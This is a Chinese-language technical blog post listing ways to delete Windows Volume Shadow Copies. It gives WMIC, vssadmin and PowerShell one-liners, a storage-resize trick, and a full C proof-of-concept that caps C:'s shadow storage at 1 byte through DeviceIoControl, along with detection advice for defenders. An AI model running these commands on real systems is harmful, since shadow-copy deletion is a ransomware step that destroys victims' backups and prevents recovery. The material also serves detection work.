一、使用系统自带工具删除卷影副本的几种方式

1.1 WMIC

cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete

1.2 VSSADMIN

vssadmin Delete Shadow /all

1.3 Powershell

Get-WmiObject Win32_ShadowCopy| % {$_.Delete()}
Get-WmiObject Win32_ShadowCopy | Remove-WmiObject

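1.4 调整大小为0

把卷影存储空间(diff area)的上限调到小于现有卷影占用的空间后,系统会自行清除已有卷影,整个过程没有显式的"删除"操作。因此只匹配 delete 类命令行的检测规则会漏掉这种方式,resize shadowstorage 也需要纳入监控。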

vssadmin resize shadowstorage /for=<backed volume>/on=<backup location volume> /maxsize=<new size>

 

二、代码实现

2.1 COM对象删除卷影

IVssBackupComponents::DeleteSnapshots

2.2 COM对象修改大小为0

IVssDifferentialSoftwareSnapshotMgmt::ChangeDiffAreaMaximumSize

2.3 DeviceIoControl删除卷影

发送IOCTL_VOLSNAP_DELETE_SNAPSHOT删除卷影

2.4 DeviceIoControl修改大小为0

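发送IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE调整卷影存储空间的上限。注意下面的示例代码并不是把大小设为0:按结构体中的注释,MaximumSpace为0表示不限制,所以代码里设置的是1字节。这种方式不经过vssadmin、WMIC或PowerShell,命令行日志中不会留下记录,检测时需要依靠系统日志中volsnap来源的事件以及对卷设备句柄操作的监控。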

#include <Windows.h>
#include <tchar.h>


/*
 * Buffer passed as the input of IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE in this
 * file: three consecutive 64-bit signed values.
 * NOTE(review): the structure is declared locally instead of coming from an
 * SDK header, so the layout is presumably reconstructed by the PoC author;
 * confirm against the referenced upstream source before relying on it.
 */
typedef struct _DIFF_AREA_SIZES
{
    LONGLONG UsedSpace; // only meaningful when querying; the set request in this file passes 0
    LONGLONG AllocatedSpace; // only meaningful when querying; the set request in this file passes 0
    LONGLONG MaximumSpace; // upper limit of the snapshot diff area; 0 means UNBOUNDED, not "no space"
} DIFF_AREA_SIZES, *PDIFF_AREA_SIZES;

// Raw device control code, defined here as a literal rather than via CTL_CODE().
// Decoding 0x53c028 with the CTL_CODE layout
// (DeviceType << 16 | Access << 14 | Function << 2 | Method) gives:
// type=0x53, access=3 (FILE_READ_ACCESS | FILE_WRITE_ACCESS),
// function=0xA (0x28 >> 2), method=0 (METHOD_BUFFERED).
// The original inline comment stated function=0xc, which does not match the value.
#define IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE 0x53c028 //type=0x53, function=0xA, method=METHOD_BUFFERED, Access=(FILE_READ_ACCESS | FILE_WRITE_ACCESS)

DWORD dwBRet; // receives the byte count written back by DeviceIoControl()
DIFF_AREA_SIZES diffAreaSize; // request buffer sent with the IOCTL
TCHAR* tszVolumePath = _T("\\\\.\\C:"); // Win32 device path of the C: volume (\\.\C:); hardcoded, but perfectly enough for a PoC
HANDLE hVolume; // handle to the opened volume device

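/*
 * PoC entry point: opens the C: volume device and sends
 * IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE with MaximumSpace = 1 byte.
 *
 * The value is 1 rather than 0 because the structure comment states that
 * 0 means UNBOUNDED; the page heading "resize to 0" is therefore not literal.
 *
 * Returns the Win32 error code of the first failing call, or ERROR_SUCCESS.
 * The original printed and returned GetLastError() unconditionally, which
 * reports a stale value when the call succeeded, ignored the BOOL result of
 * DeviceIoControl(), and read the last error after CloseHandle() had a
 * chance to overwrite it. Error codes are now captured immediately after
 * the call they belong to and only when that call reports failure.
 *
 * NOTE(review): opening \\.\C: for read/write typically requires an elevated
 * token - confirm. For detection, this path produces no vssadmin / WMIC /
 * PowerShell command line; look for volsnap-source events in the System log
 * (Event ID 33 is the one usually associated with snapshots being dropped to
 * stay under the configured limit - confirm on your build) and for
 * write-access opens of volume devices by unexpected processes.
 */
int _tmain(int argc, _TCHAR** argv)
{
    DWORD dwErr = ERROR_SUCCESS;

    (void)argc; // command-line arguments are not used by this PoC
    (void)argv;

    diffAreaSize.UsedSpace = 0; //unused anyway
    diffAreaSize.AllocatedSpace = 0; //unused anyway
    diffAreaSize.MaximumSpace = 1; //set to 1 byte of snapshot storage

    _tprintf(_T("Calling CreateFile()...\r\n"));

    hVolume = CreateFile(
        tszVolumePath,
        FILE_GENERIC_READ | FILE_GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    // Read the error code only on failure, and before any other API call
    // can overwrite the thread's last-error value.
    if (INVALID_HANDLE_VALUE == hVolume)
    {
        dwErr = GetLastError();
    }

    // DWORD is unsigned long, so %lu is the matching conversion (was %i).
    _tprintf(TEXT("CreateFile() returned %lu\r\n"), dwErr);
    if (INVALID_HANDLE_VALUE == hVolume)
    {
        return (int)dwErr;
    }

    _tprintf(_T("Calling DeviceIoControl()...\r\n"));

    // DeviceIoControl() returns FALSE on failure; only then is the
    // last-error value meaningful.
    if (!DeviceIoControl(
        hVolume,
        IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE,
        &diffAreaSize,
        sizeof(diffAreaSize),
        NULL,
        0,
        &dwBRet,
        NULL
    ))
    {
        dwErr = GetLastError();
    }

    _tprintf(_T("DeviceIoControl() returned %lu\r\n"), dwErr);

    CloseHandle(hVolume);
    hVolume = INVALID_HANDLE_VALUE; // do not leave a stale handle in the global

    // Return the saved code, not a fresh GetLastError() taken after CloseHandle().
    return (int)dwErr;
}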


 

三、参考

https://github.com/gtworek/PSBits/blob/942b0e2293f6fcd4d5938ae387a3ee9e81ea94e8/IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE/IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE.c

https://www.freebuf.com/articles/system/239560.html

原文地址:http://www.cnblogs.com/ciyze0101/p/16901841.html
